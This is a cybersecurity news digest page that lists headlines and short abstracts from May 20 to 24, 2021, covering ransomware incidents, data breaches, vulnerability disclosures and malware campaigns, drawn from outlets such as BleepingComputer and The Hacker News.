Abstract According to researchers, the company’s data was exposed on an Elasticsearch server and comprises two sets of records: login credentials and shipment details (including PII).

Hackread

May 24, 2021 – Government

Indonesian govt blocks access to RaidForums hacking forum after data leak Full Text

Abstract The Indonesian government is blocking access to the RaidForums hacking forum after the alleged personal information of Indonesian citizens was posted online.

BleepingComputer

May 24, 2021 – Hacker

North Korean hackers behind CryptoCore multi-million dollar heists Full Text

Abstract Security researchers piecing together evidence from multiple attacks on cryptocurrency exchanges, attributed to a threat actor they named CryptoCore have established a strong connection to the North Korean state-sponsored group Lazarus.

BleepingComputer

May 24, 2021 – Government

Belgium approves new cyber strategy with emphasis on essential institutions Full Text

Abstract Two weeks after Belgium’s parliament and scientific institutions were hit by a cyberattack, the National Security Council approved a new cybersecurity strategy to shore up its digital defenses.

The Record

May 24, 2021 – Business

What To Do When Your Business Is Hacked Full Text

Abstract As businesses move to a remote workforce, hackers have increased their activity to capitalize on new security holes. Cybercriminals often use unsophisticated methods that continue to be extremely successful. These include phishing emails to harvest credentials and gain easy access to business-critical environments. Hackers are also using ransomware to hold your data hostage, demanding a ransom payment in exchange for a decryption key that unlocks your stolen data. When dealing with a cyberattack, there are practical steps you want to follow. What do these steps include?
1. Quickly contain and isolate critical systems
2. Report the hack to your customers and business stakeholders
3. Engage the help of law enforcement
4. Enact your disaster recovery and business continuity plans
5. Analyze the attack, and remediate
Quickly contain and isolate critical systems. This first step is necessary: quickly contain and isolate critical systems. There is a chance that if you discover ransomware or o

The Hacker News

May 24, 2021 – Criminals

Michigan Man Admits Selling UPMC Employee Data Full Text

Abstract "TheDearthStar" hacker confesses to stealing and selling PII of more than 65,000 medical center employees

Infosecurity Magazine

May 24, 2021 – Vulnerabilities

13 flaws in Nagios IT Monitoring Software pose serious risk to orgs Full Text

Abstract Researchers disclosed details about 13 vulnerabilities in the Nagios network monitoring application that could be exploited for malicious purposes. Cybersecurity researchers from Skylight Cyber disclosed technical details about 13 vulnerabilities...

Security Affairs

May 24, 2021 – Business

Cynerio raises $30 million to protect medical IoT Full Text

Abstract IoT security is bad mostly everywhere, but threats against medical devices bring some of the most worrying potential for damage against health care organizations and their patients.

SCMagazine

May 24, 2021 – Government

U.S. Government Asks Victims of 2017 EtherDelta Hack to Come Forward Full Text

Abstract The U.S. government is hoping to obtain additional information on the 2017 hacker attack targeting the EtherDelta crypto trading platform and it has asked victims of the incident to come forward.

Security Week

May 24, 2021 – Policy and Law

Amex Fined After Sending Over Four Million Spam Emails Full Text

Abstract ICO claims customers did not consent to receiving marketing messages

Infosecurity Magazine

May 24, 2021 – Phishing

Ongoing Bitcoin Scams Demonstrate Power of Social Engineering Triggers Full Text

Abstract On May 17, 2021, the US Federal Trade Commission announced, “Since October 2020, reports have skyrocketed, with nearly 7,000 people reporting losses of more than $80 million on these scams.”

Security Week

May 24, 2021 – Breach

Air India: Supplier Breach Hit 4.5 Million Passengers Full Text

Abstract Fallout from the SITA incident in March continues

Infosecurity Magazine

May 24, 2021 – Breach

Australia-based TPG TrustedCloud Hosting Service Discloses Unauthorized Access to Two Customers’ Data Full Text

Abstract TPG Telecom said on Monday that it had the data of two customers accessed on its legacy TrustedCloud hosting service. It added it did not believe any other customers were impacted by the breach.

ZDNet

May 24, 2021 – Breach

User Information Linked to 180 Million Orders from Domino’s India Leaked Online Full Text

Abstract In a major data leak, customer information related to 180 million orders placed with Domino’s India has been made public by a hacker who claims to have breached the pizza major’s servers.

The Times Of India

May 24, 2021 – Privacy

Chinese government has warned 222 apps to remove data slurping code Full Text

Abstract Three weeks after a data privacy protection law has entered into effect in China, the Beijing government has begun warning mobile app developers to remove intrusive data slurping code from their apps.

The Record

May 24, 2021 – Breach

Indonesia’s National Health Insurance Scheme Potentially Leaks One Million Citizens’ Records Full Text

Abstract A post on Raidforums offered to sell a million records leaked from the Badan Penyelenggara Jaminan Sosial (BPJS), an agency that runs national health insurance scheme Jaminan Kesehatan Nasional (JKN).

The Register

May 24, 2021 – Hacker

Researchers achieved persistent shell access on a Boeing 747 Full Text

Abstract Researchers from Pen Test Partners established a persistent shell on an in-flight entertainment (IFE) system from a Boeing 747 airliner after exploiting a vulnerability dating back to 1999.

The Register

May 24, 2021 – Business

Insurance Giant Reportedly Paid $40 Million Ransom Full Text

Abstract CNA Financial was struck in March this year

Infosecurity Magazine

May 24, 2021 – Breach

FSB NKTsKI: Foreign ‘cyber mercenaries’ breached Russian federal agencies Full Text

Abstract Rostelecom and NKTsKI said the attackers used spear-phishing, vulnerabilities in web applications, and targeted the IT infrastructure of government contractors to breach Russian federal agencies.

The Record

May 24, 2021 – Policy and Law

Irish court issues injunction against Conti hackers to stop health service data exposure, sale Full Text

Abstract The injunction would make it illegal for information stolen during the ransomware attack against the Health Service Executive (HSE) to be shared, processed, sold, or otherwise published online.

ZDNet

May 24, 2021 – Solution

Microsoft: This new open source tool helps you test your defences against hacker attacks Full Text

Abstract Microsoft has released SimuLand, an open-source project which aims to help security teams reproduce known attack scenarios - and test just how good Microsoft's core security products are.

ZDNet

May 24, 2021 – Vulnerabilities

Details Disclosed On Critical Flaws Affecting Nagios IT Monitoring Software Full Text

Abstract Cybersecurity researchers disclosed details about 13 vulnerabilities in the Nagios network monitoring application that could be abused by an adversary to hijack the infrastructure without any operator intervention. "In a telco setting, where a telco is monitoring thousands of sites, if a customer site is fully compromised, an attacker can use the vulnerabilities to compromise the telco, and then every other monitored customer site," Adi Ashkenazy, CEO of Australian cybersecurity firm Skylight Cyber, told The Hacker News via email. Nagios is an open-source IT infrastructure tool analogous to SolarWinds Network Performance Monitor (NPM) that offers monitoring and alerting services for servers, network cards, applications, and services. The issues, which consist of a mix of authenticated remote code execution (RCE) and privilege escalation flaws, were discovered and reported to Nagios in October 2020, following which they were remediated in November. Chief among them i

The Hacker News

May 24, 2021 – Ransomware

Zeppelin ransomware comes back to life with updated versions Full Text

Abstract The developers of Zeppelin ransomware have resumed their activity after a period of relative silence that started last Fall and started to advertise new versions of the malware.

BleepingComputer

May 24, 2021 – Vulnerabilities

Anker fixed an issue that caused access to Eufy video camera feeds to random users Full Text

Abstract A misconfiguration issue in the software used by the Eufy video camera exposed private information and video streams of customers. Chinese electronics vendor Anker has recently addressed a bug that mistakenly exposed private information and video...

Security Affairs

May 23, 2021 – Outage

Microsoft Exchange admin portal blocked by expired SSL certificate Full Text

Abstract The Microsoft Exchange admin portal is currently inaccessible from some browsers after Microsoft forgot to renew the SSL certificate for the website.

BleepingComputer

May 23, 2021 – Policy and Law

Pipeline shutdown shows need for tougher cybersecurity laws Full Text

Abstract The Colonial Pipeline incident revealed just how easy it was to bring a massive part of American infrastructure to a halt with a hack that, by cybersecurity standards, was about as sophisticated as a pickpocketing.

Boston Globe

May 23, 2021 – Vulnerabilities

CVE-2021-31166 Windows HTTP flaw also impacts WinRM servers Full Text

Abstract The wormable CVE-2021-31166 vulnerability in the HTTP Protocol Stack of the Windows IIS server also affects WinRM on Windows 10 and Server systems. Microsoft Patch Tuesday for May 2021 security updates addressed 55 vulnerabilities in Microsoft including...

Security Affairs

May 23, 2021 – Policy and Law

Amex fined £90,000 for sending 4 million spam emails in a year Full Text

Abstract The UK data regulator has fined American Express (Amex) £90,000 for sending over 4 million spam emails to customers within one year.

BleepingComputer

May 23, 2021 – Ransomware

Firm tracked DarkSide gang ransomware payments and the massive sums paid Full Text

Abstract The gang’s wallet received a 75 BTC (bitcoin) payment, or roughly $5 million, made by Colonial Pipeline on May 8 following the cyberattack on its operations, according to a report from blockchain analytics firm Elliptic.

Fox Business

May 23, 2021 – General

Security Affairs newsletter Round 315 Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. Avaddon Ransomware gang hacked France-based Acer Finance and AXA Asia. MSBuild tool used to deliver...

Security Affairs

May 23, 2021 – Attack

Colonial Pipeline attack shows Canada must get serious about cybersecurity Full Text

Abstract Ransomware attacks in Canada cost hundreds of millions of dollars in 2020 alone, with more than 4,000 attacks on our soil. In 2019, the official total was $2.3 billion, which is considered an extremely conservative estimate.

National Post

May 23, 2021 – Malware

A malware attack hit the Alaska Health Department Full Text

Abstract The Alaska health department website was forced offline by a malware attack, and officials are investigating the incident. The website of the Alaska health department was forced offline this week by a malware attack. Local authorities launched an investigation...

Security Affairs

May 23, 2021 – General

Cyber attacks on critical infrastructure: Is India ready? Full Text

Abstract In recent years, attacks targeting critical infrastructure and businesses have surged. These include the 2017 WannaCry and NotPetya ransomware attacks, the 2015 attack on Ukrainian power grids, and the 2010 Stuxnet attack on the Iranian nuclear reactor.

Hindustan Times

May 22, 2021 – Insider Threat

FBI Analyst Charged With Stealing Counterterrorism and Cyber Threat Info Full Text

Abstract The U.S. Department of Justice (DoJ) indicted an employee of the Federal Bureau of Investigation (FBI) for illegally removing numerous national security documents and willfully retaining them at her personal residence during a 13-year period from June 2004 to December 2017. The federal indictment charged Kendra Kingsbury, 48, with two counts of having unauthorized possession of documents relating to the national defense, according to an unsealed indictment that was made public on Friday. Kingsbury worked as an intelligence analyst in the FBI's Kansas City Division for more than 12 years, until her suspension in 2017. "The breadth and depth of classified national security information retained by the defendant for more than a decade is simply astonishing," said Alan E. Kohler, Jr., Assistant Director of the FBI's Counterintelligence Division, in a statement. Stating that Kingsbury knew she was not authorized to remove and retain access to these sensitive govern

The Hacker News

May 22, 2021 – Ransomware

FBI Warns Conti Ransomware Hit 16 U.S. Health and Emergency Services Full Text

Abstract The adversary behind Conti ransomware targeted no fewer than 16 healthcare and first responder networks in the U.S. within the past year, victimizing over 400 organizations worldwide in total, 290 of which are situated in the country. That's according to a new flash alert issued by the U.S. Federal Bureau of Investigation (FBI) on Thursday. "The FBI identified at least 16 Conti ransomware attacks targeting U.S. healthcare and first responder networks, including law enforcement agencies, emergency medical services, 9-1-1 dispatch centers, and municipalities within the last year," the agency said. Ransomware attacks have worsened over the years, with recent targets as varied as state and local governments, hospitals, police departments, and critical infrastructure. Conti is one of many ransomware strains that have capitalized on that trend, commencing its operations in July 2020 as a private Ransomware-as-a-Service (RaaS), in addition to jumping on the double extort

The Hacker News

May 22, 2021 – Malware

Bizarro banking malware targets 70 banks in Europe and South America Full Text

Abstract A banking trojan named Bizarro that originates from Brazil has crossed the borders and started to target customers of 70 banks in Europe and South America.

BleepingComputer

May 22, 2021 – Vulnerabilities

Wormable Windows HTTP vulnerability also affects WinRM servers Full Text

Abstract A wormable remote code execution (RCE) vulnerability in the Windows IIS server can also be used to attack unpatched Windows 10 and Server systems publicly exposing the WinRM (Windows Remote Management) service.

BleepingComputer

May 22, 2021 – Ransomware

Qlocker ransomware leverages HBS flaw to infect QNAP NAS devices Full Text

Abstract QNAP urges customers to update the HBS 3 disaster recovery app to prevent Qlocker ransomware attacks. Taiwanese vendor QNAP is urging its customers to update the HBS 3 disaster recovery app running on their Network Attached Storage (NAS) devices...

Security Affairs

May 22, 2021 – Ransomware

FBI says Conti Ransomware Gang has Hit 16 U.S. Health and Emergency Networks Full Text

Abstract The Federal Bureau of Investigation said that the same group of online extortionists blamed for striking the Irish health system last week have also hit at least 16 U.S. medical and first response networks in the past year.

Reuters

May 22, 2021 – Breach

Foreign hackers breached Russian federal agencies, said FSB Full Text

Abstract FSB National Coordination Center for Computer Incidents (NKTsKI) revealed that foreign hackers have breached networks of Russian federal agencies. A joint report published by Rostelecom-Solar and the FSB National Coordination Center for Computer Incidents...

Security Affairs

May 22, 2021 – Privacy

A Chinese hacking competition may have given Beijing new ways to spy on the Uyghurs Full Text

Abstract With the advent of the Tianfu Cup, China appears to have access to a new talent pool of expert hackers, motivated by the competition’s prize money to produce potentially harmful hacks that Beijing may be willing to use both at home and abroad.

The Conversation

May 22, 2021 – Ransomware

Conti Ransomware hit 16 US health and emergency Services, said FBI Full Text

Abstract Conti ransomware targeted over 400 organizations worldwide, 290 in the US, and at least 16 healthcare and first responder networks. The Federal Bureau of Investigation (FBI) revealed that the Conti ransomware gang has hit at least 16 healthcare and first...

Security Affairs

May 22, 2021 – Ransomware

Avaddon Targets Insurer AXA with Ransomware Full Text

Abstract Avaddon ransomware group targeted Asia-based insurer AXA with DDoS attacks and ransomware just a week after the insurance company announced it was dropping support for ransomware payments in France.

Avast

May 22, 2021 – Breach

Air India suffered a data breach, 4.5 million customers impacted Full Text

Abstract Air India disclosed a data breach that impacted roughly 4.5 million of its customers, two months after its Passenger Service System provider SITA was hacked. Air India has disclosed a data breach that impacted 4.5 million of its customers, exposed...

Security Affairs

May 22, 2021 – Breach

Mobile App Developers Exposed 100 Million Android Users’ Data Full Text

Abstract The Check Point Research team has recently discovered that in the last few months, mobile app developers potentially exposed the private data of over 100 million Android users, by not following best security practices.

Heimdal Security

May 21, 2021 – Breach

Air India Hack Exposes Credit Card and Passport Info of 4.5 Million Passengers Full Text

Abstract India's flag carrier airline, Air India, has disclosed a data breach affecting 4.5 million of its customers over a period stretching nearly 10 years after its Passenger Service System (PSS) provider SITA fell victim to a cyber attack earlier this year. The breach involves personal data registered between Aug. 26, 2011 and Feb. 3, 2021, including details such as names, dates of birth, contact information, passport information, ticket information, Star Alliance, and Air India frequent flyer data as well as credit card data. But Air India said neither CVV/CVC numbers associated with the credit cards nor passwords were affected. The airline had previously acknowledged the breach on March 19, stating that "its Passenger Service System provider has informed about a sophisticated cyber attack it was subjected to in the last week of February 2021." In March, Swiss aviation information technology company SITA disclosed it suffered a "highly sophisticated attack"

The Hacker News

May 21, 2021 – Criminals

DarkSide Getting Taken to ‘Hackers’ Court’ For Not Paying Affiliates Full Text

Abstract A shadow court system for hackers shows how professional ransomware gangs have become.

Threatpost

May 21, 2021 – General

Building SIEM for Today’s Threat Landscape Full Text

Abstract Sivan Tehila, cybersecurity strategist at Perimeter 81, discusses the elements involved in creating a modern SIEM strategy for remote work and cloud-everything.

Threatpost

May 21, 2021 – Ransomware

The Week in Ransomware - May 21st 2021 - Healthcare under attack Full Text

Abstract This week's ransomware news has been dominated by the attack on Ireland's Health Service Executive (HSE) that has severely disrupted Ireland's healthcare system.

BleepingComputer

May 21, 2021 – Malware

Security Flaws in Stalkerware Apps are a Growing Danger Full Text

Abstract Security analysts at ESET identified 158 privacy and security issues in 58 Android stalkerware apps that could lead to account and device hijacking, data manipulation, and remote code execution, among others.

Cyware Alerts - Hacker News

May 21, 2021 – General

Hillicon Valley: Tim Cook defends App Store rules during antitrust trial | Online school raises new concerns about cyberbullying | Dating apps adding vaccination badges to user profiles Full Text

Abstract Apple’s CEO Tim Cook testified in defense of the App Store as part of the ongoing antitrust trial between Apple and Fortnite developer Epic Games. Meanwhile, concerns over the hate speech children face online are drawing rare bipartisan agreement. And, the White House is taking a new route to encourage Americans to get vaccinated — through dating apps.

The Hill

May 21, 2021 – Attack

Insurance Firm CNA Financial Reportedly Paid Hackers $40 Million in Ransom Full Text

Abstract U.S. insurance giant CNA Financial reportedly paid $40 million to a ransomware gang to recover access to its systems following an attack in March, making it one of the most expensive ransoms paid to date. The development was first reported by Bloomberg, citing "people with knowledge of the attack." The adversary that staged the intrusion is said to have allegedly demanded $60 million a week after the Chicago-based company began negotiations with the hackers, culminating in the payment two weeks following the theft of company data. In a statement shared on May 12, CNA Financial said it had "no evidence to indicate that external customers were potentially at risk of infection due to the incident." The attack has been attributed to new ransomware known as 'Phoenix CryptoLocker,' according to a March report from Bleeping Computer, with the strain believed to be an offshoot of WastedLocker and Hades, both of which have been utilized by Evil Corp, a Ru

The Hacker News

May 21, 2021 – General

IC3 Logs Six Millionth Complaint Full Text

Abstract FBI’s Internet Crime Complaint Center passes complaint milestone

Infosecurity Magazine

May 21, 2021 – Criminals

Report: how cybercriminals abuse API keys to steal millions Full Text

Abstract CyberNews researchers found that crooks could abuse cryptocurrency exchange API keys and steal cryptocurrencies. Original post available here: https://cybernews.com/security/report-how-cybercriminals-abuse-api-keys-to-steal-millions/ CyberNews...

Security Affairs

May 21, 2021 – General

79% of observed Microsoft Exchange Server exposures occurred in the cloud Full Text

Abstract Said one expert, traditional configuration management database technologies haven’t made the leap to cloud native and can’t properly collect and continuously detect changes.

SCMagazine

May 21, 2021 – Breach

Air India data breach impacts 4.5 million customers Full Text

Abstract Air India disclosed a data breach after personal information belonging to roughly 4.5 million of its customers was leaked two months following the hack of Passenger Service System provider SITA in February 2021.

BleepingComputer

May 21, 2021 – Attack

Attackers Actively Striking with Cobalt Strike Full Text

Abstract Researchers claim that the Cobalt Strike penetration testing kit, along with the Metasploit framework, was abused to host over 25% of malicious C2 servers deployed in 2020. Do you have a prepared strategy to protect organizations from this threat?

Cyware Alerts - Hacker News

May 21, 2021 – Policy and Law

Telemarketing Fraudster Jailed for Ten Years Full Text

Abstract Scammer partnered with Peruvian call centers to extort $3.5m from Spanish-speaking US residents

Infosecurity Magazine

May 21, 2021 – Government

Indonesia's government confirms social security data breach for some citizens Full Text

Abstract Indonesia has launched an investigation into a possible security incident that caused the leak of social security data for more than 270 million citizens. Indonesia's Communication and Information Ministry has confirmed a leak of social security...

Security Affairs

May 21, 2021 – Business

ServiceNow, Microsoft expand partnership, enable ‘virtual war room’ during cyber incidents Full Text

Abstract One of the important features of the integrations is major security incident management, which can be described as “a war room” for handling major incidents and security breaches. The offering enables all teams across a company to coordinate response during a major security incident, like the recent Colonial Pipeline attack.

SCMagazine

May 21, 2021 – Government

FBI: Conti ransomware attacked 16 US healthcare, first responder orgs Full Text

Abstract The Federal Bureau of Investigation (FBI) says the Conti ransomware gang has attempted to breach the networks of over a dozen US healthcare and first responder organizations.

BleepingComputer

May 21, 2021 – Botnet

Simps Botnet Uses Gafgyt Modules Full Text

Abstract Researchers uncovered a new botnet malware purposed for DDoS attacks on gaming and other sectors. The malware operators created a Discord server and YouTube channel for its demonstration.

Cyware Alerts - Hacker News

May 21, 2021 – Criminals

Ransomware Gang Gifts Decryption Tool to HSE Full Text

Abstract Cyber-criminals give Irish health system free decryption tool after crippling it with ransomware

Infosecurity Magazine

May 21, 2021 – Business

Insurance giant CNA Financial paid a $40 million ransom Full Text

Abstract The US insurance giant CNA Financial reportedly paid a $40 million ransom to restore access to its files following a ransomware attack. CNA Financial, one of the largest insurance companies in the US, reportedly paid a $40 million ransom to restore...

Security Affairs

May 21, 2021 – Ransomware

QNAP confirms Qlocker ransomware used HBS backdoor account Full Text

Abstract QNAP is advising customers to update the HBS 3 disaster recovery app to block Qlocker ransomware attacks targeting their Internet-exposed Network Attached Storage (NAS) devices.

BleepingComputer

May 21, 2021 – Skimming

PHP Abused for Web Skimming Attacks Full Text

Abstract In the first week of May, security researchers raised an alarm about a decade-old supply chain flaw in the PHP package manager that could have put millions of websites at risk.

Cyware Alerts - Hacker News

May 21, 2021 – Criminals

DarkSide affiliates claim gang’s bitcoin deposit on hacker forum Full Text

Abstract Since the DarkSide ransomware operation shut down a week ago, multiple affiliates have complained about not getting paid for past services and issued a claim for bitcoins in escrow at a hacker forum.

BleepingComputer

May 21, 2021 – Attack

UK Insurance Firm One Call Targeted by Darkside Ransomware Gang Full Text

Abstract The attack on the Doncaster-based insurance company was just a few days after the Colonial Pipeline's initial compromise on May 7 and one day before the ransomware gang claimed to be shutting up shop.

The Register

May 21, 2021 – Botnet

Ransomware-spreading Phorpiex Botnet Disables Security Solutions to Maintain Persistence Full Text

Abstract Microsoft notes that from December 2020 to February 2021, the Phorpiex bot loader was encountered in 160 countries, with Mexico, Kazakhstan, and Uzbekistan being the top targeted countries.

ZDNet

May 21, 2021 – Government

China internet watchdog cites 105 apps for improper data collection Full Text

Abstract China’s internet watchdog on Friday cited 105 apps operating in its country, including Microsoft Bing and LinkedIn, over allegations of illegal data collection of users’ personal information. 

The Hill

May 21, 2021 – Breach

E-commerce giant suffers major data breach in Codecov incident Full Text

Abstract E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack. Mercari is a publicly traded Japanese company and an online marketplace that has recently expanded its operations to the United States and the United Kingdom.

BleepingComputer

May 21, 2021 – Attack

Two Toyota Subsidiaries Across Europe and the US Hit by Ransomware Attacks Full Text

Abstract The European operations of its subsidiary Daihatsu Diesel Company were hit by an attack, while the Toyota subsidiary Auto Parts Manufacturing Mississippi also revealed a ransomware attack.

The Register

May 21, 2021 – Malware

Microsoft Warns of Data Stealing Malware That Pretends to Be Ransomware Full Text

Abstract Microsoft on Thursday warned of a "massive email campaign" that's pushing a Java-based STRRAT malware to steal confidential data from infected systems while disguising itself as a ransomware infection. "This RAT is infamous for its ransomware-like behavior of appending the file name extension .crimson to files without actually encrypting them," the Microsoft Security Intelligence team said in a series of tweets. The new wave of attacks, which the company spotted last week, commences with spam emails sent from compromised email accounts with "Outgoing Payments" in the subject line, luring the recipients into opening malicious PDF documents that claim to be remittances, but in reality, connect to a rogue domain to download the STRRAT malware. Besides establishing connections to a command-and-control server during execution, the malware comes with a range of features that allow it to collect browser passwords, log keystrokes, and run remote command

The Hacker News

May 21, 2021 – General

Report Shows Global CISOs Failing to Practice What They Preach Full Text

Abstract Report reveals widespread risky behavior from IT security leaders

Infosecurity Magazine

May 21, 2021 – Criminals

Bitcoins of DarkSide ransomware gang still locked in hacker forum’s escrow Full Text

Abstract After DarkSide ransomware gang shut down operations, multiple affiliates have complained about not receiving the payments for successful breaches. The decision of the DarkSide ransomware gang to shut down operations is causing chaos among its network...

Security Affairs

May 21, 2021 – Criminals

DarkSide affiliates claim gang’s bitcoins in deposit on hacker forum Full Text

Abstract Since the DarkSide ransomware operation shut down a week ago, multiple affiliates have complained about not getting paid for past services and issued a claim for bitcoins in escrow at a hacker forum.

BleepingComputer

May 21, 2021 – Attack

CNA Financial Paid $40 Million in Ransom After March Cyberattack Full Text

Abstract CNA Financial, one of the largest U.S. insurance companies, paid $40 million in late March to regain control of its network after a ransomware attack, according to people familiar with the matter.

Bloomberg

May 21, 2021 – General

Global Credential Stuffing Attempts Hit 193 Billion in 2020 Full Text

Abstract Akamai claims web app attacks also surged to 6.3 billion

Infosecurity Magazine

May 21, 2021 – Solution

Microsoft SimuLand, an open-source lab environment to simulate attack scenarios Full Text

Abstract Microsoft released SimuLand, an open-source tool that can be used to build lab environments to simulate attacks and verify their detection. Microsoft has released SimuLand, an open-source lab environment that allows security teams to reproduce the techniques used...

Security Affairs

May 21, 2021 – Malware

Microsoft Warns of Massive STRRAT Malware Campaign Delivering Fake Ransomware Full Text

Abstract The Java-based STRRAT was distributed in a massive spam campaign, the malware shows ransomware-like behavior of appending the file name extension .crimson to files without actually encrypting them.

Security Affairs

May 21, 2021 – Breach

Cloud Misconfiguration Exposes 100M+ Android Users Full Text

Abstract Check Point reveals series of mistakes by developers

Infosecurity Magazine

May 21, 2021 – Outage

Alaska Health Department Website Faces Outage Following Malware Attack Full Text

Abstract The Alaska department's website was taken offline Monday evening and will be unavailable to the public until further details are known about the security incident, department officials say.

Gov Info Security

May 21, 2021 – Business

Apple isn’t happy about the amount of Mac malware out there Full Text

Abstract A top Apple exec has said that Mac malware has now exceeded Apple's level of tolerance, and framed security as the reason for keeping iPhones locked to the App Store, during testimony in a lawsuit.

ZDNet

May 21, 2021 – Business

API security startup 42Crunch raises $17M Series A led by Energy Impact Partners Full Text

Abstract 42Crunch, an API security startup, has raised $17 million in its Series A funding round led by Energy Impact Partners. Adara Ventures also participated in this funding round.

TechCrunch

May 21, 2021 – General

3.4 billion credential stuffing attacks hit financial services organizations Full Text

Abstract In 2020, there were 193 billion credential stuffing attacks globally, with 3.4 billion hitting financial services organizations specifically – an increase of more than 45% YOY in the sector.

Help Net Security

May 21, 2021 – Attack

#RSAC: The Most Dangerous New Attack Techniques Full Text

Abstract Annual panel at the RSA Conference identifies a number of areas of concern, including improper session handling and an evolution of ransomware

Infosecurity Magazine

May 20, 2021 – Breach

Misconfigurations may have exposed data on 100 million Android users Full Text

Abstract CheckPoint Research explained how the misuse of a real-time database, notification managers, and storage exposed the personal data of users, leaving corporate resources vulnerable to bad threat actors.

SCMagazine

May 20, 2021 – Policy and Law

Irish High Court issues injunction to prevent HSE data leak Full Text

Abstract The High Court of Ireland has issued an injunction against the Conti Ransomware gang, demanding that stolen HSE data be returned and not sold or published.

BleepingComputer

May 20, 2021 – Government

Top Arizona elections official says voting machines turned over to GOP recount should be replaced Full Text

Abstract Arizona Secretary of State Katie Hobbs (D) on Thursday advised Maricopa County officials to replace all voting machines that were turned over to the private contractor carrying out an audit of the 2020 presidential election.

The Hill

May 20, 2021 – General

#RSAC: The Rise of the Chief Product Security Officer Full Text

Abstract Experts at the RSA Conference outline the role, challenges and opportunities for the emerging job category of the chief product security officer (CPSO)

Infosecurity Magazine

May 20, 2021 – General

#RSAC: Cyber-threat Landscape “the Worst It’s Ever Been” Due to Nation-State Behaviors Full Text

Abstract Iran, Russia, North Korea and China are becoming increasingly reckless in their actions

Infosecurity Magazine

May 20, 2021 – Solution

Comcast now blocks BGP hijacking attacks and route leaks with RPKI Full Text

Abstract Comcast, one of America's largest broadband providers, has now deployed RPKI on its network to defend against BGP route hijacks and leaks. Left unchecked, a BGP route hijack or leak can cause a drastic surge in internet traffic that now gets misdirected or stuck, leading to global congestion and a Denial of Service (DoS).

BleepingComputer

May 20, 2021 – Malware

AHK Rat Loader Delivers Multiple RATs Full Text

Abstract A malware campaign that has been undergoing constant development in its toolsets since February now boasts of four different malware versions - all of which start with an AHK executable that leads to the different VBScripts.

Cyware Alerts - Hacker News

May 20, 2021 – General

Hillicon Valley: Amazon facing lawsuits alleging racial, gender bias | Senate Commerce panel advances Biden’s top science nominee | Colonial Pipeline CEO to testify on Capitol Hill in June Full Text

Abstract Amazon this week found itself in more hot water, as multiple women at the company accused the company of racial and gender bias discrimination in lawsuits filed Wednesday. Meanwhile on Capitol Hill, the Senate Commerce Committee approved President Biden’s nominee to lead the Office of Science and Technology Policy, and the House Homeland Security Committee announced that Colonial Pipeline CEO Joseph Blount will testify on the recent ransomware attack next month.

The Hill

May 20, 2021 – General

#RSAC: What Makes a Security Program Measurably More Successful? Full Text

Abstract Wendy Nather and Wade Baker have a few data-driven ideas about which activities actually help to make security programs work and which ones have less impact

Infosecurity Magazine

May 20, 2021 – Malware

STRRAT RAT spreads masquerading as ransomware Full Text

Abstract Microsoft warns of a malware campaign that is spreading a RAT dubbed STRRAT masquerading as ransomware. Microsoft Security Intelligence researchers uncovered a malware campaign that is spreading a remote access trojan (RAT) tracked as STRRAT....

Security Affairs

May 20, 2021 – Hacker

What makes North Korean hacking groups more creative? Full Text

Abstract From use of custom malware to pioneering strategies, North Korean hacking groups have shown an innovative spirit that helps them to punch above their weight.

SCMagazine

May 20, 2021 – Vulnerabilities

Four Android Bugs Being Exploited in the Wild Full Text

Abstract On Wednesday, Google quietly slipped updates into its May 3 Android security bulletin for bugs that its Project Zero group has confirmed are zero-days.

Threatpost

May 20, 2021 – Solution

Microsoft releases SimuLand, a test lab for simulated cyberattacks Full Text

Abstract Microsoft has released SimuLand, an open-source lab environment to help test and improve Microsoft 365 Defender, Azure Defender, and Azure Sentinel defenses against real attack scenarios.

BleepingComputer

May 20, 2021 – Phishing

Fraudsters Employ Amazon Voice Phishing Attacks in Fake Order Scams Full Text

Abstract In case studies it published, Armorblox highlighted two Amazon vishing attacks intent on stealing customer credit card details -- and how the use of voice messages can bypass existing spam filters.

ZDNet

May 20, 2021 – Business

Colonial Pipeline CEO to testify on Capitol Hill in June following cyberattack Full Text

Abstract Colonial Pipeline CEO Joseph Blount will testify in June before the House Homeland Security Committee at a hearing one month after the company was forced to shut down operations due to a devastating ransomware attack. 

The Hill

May 20, 2021 – Privacy

USPS Reportedly Uses Clearview AI to Spy on Americans Full Text

Abstract US Postal Service reportedly uses facial recognition tech to identify unknown targets in investigations

Infosecurity Magazine

May 20, 2021 – General

2021 Attacker Dwell Time Trends and Best Defenses Full Text

Abstract The time that attackers stay hidden inside an organization’s networks is shifting, putting pressure on defenders and upping the need to detect and respond to threats in real-time.

Threatpost

May 20, 2021 – Disinformation

Spammers flood PyPI with pirated movie links and bogus packages Full Text

Abstract The official Python software package repository, PyPI, is getting flooded with spam packages, as seen by BleepingComputer. These packages are named after different movies in a style that is commonly associated with torrents and "warez" sites hosting pirated content.

BleepingComputer

May 20, 2021 – Education

GlobalPlatform expands TEE certification scheme Full Text

Abstract GlobalPlatform has expanded its Trusted Execution Environment (TEE) security certification scheme to enable evaluation of discrete technologies that come together to make up a complete TEE solution.

Help Net Security

May 20, 2021 – Ransomware

US insurer paid $40 million ransom after March cyber attack: report Full Text

Abstract One of the largest insurance companies in the U.S. reportedly paid $40 million in ransom in March to regain control of its network following a ransomware attack.

The Hill

May 20, 2021 – General

Cyber-bully Supermodel Dropped by 3 Stores Full Text

Abstract Chrissy Teigen’s apology for previous cyber-bullying not enough to stop retailers from ditching her products

Infosecurity Magazine

May 20, 2021 – Malware

Apple Exec Calls Level of Mac Malware ‘Unacceptable’ Full Text

Abstract Company is using threat of attacks as defense in case brought against it by Epic Games after Fortnite was booted from the App Store for trying to circumvent developer fees.

Threatpost

May 20, 2021 – General

Blind SQL Injection flaw in WP Statistics Plugin Impacts Over 600,000 WordPress Sites Full Text

Abstract Researchers from the Wordfence Threat Intelligence discovered a Time-Based Blind SQL Injection vulnerability in WP Statistics, which is a WordPress plugin with over 600,000 active installs.

Security Affairs

May 20, 2021 – Policy and Law

Nigeria Suspends Official Charged with Defrauding US Full Text

Abstract Governor’s aide suspended following arrest over unemployment benefits fraud

Infosecurity Magazine

May 20, 2021 – Ransomware

Colonial Pipeline confirms it paid $4.4m ransom to hacker gang after attack Full Text

Abstract Joseph Blount, Colonial Pipeline’s CEO, told the Wall Street Journal he authorized the payment because the firm didn’t know the extent of the damage and wasn’t sure how long it would take to recover.

The Guardian

May 20, 2021 – Solution

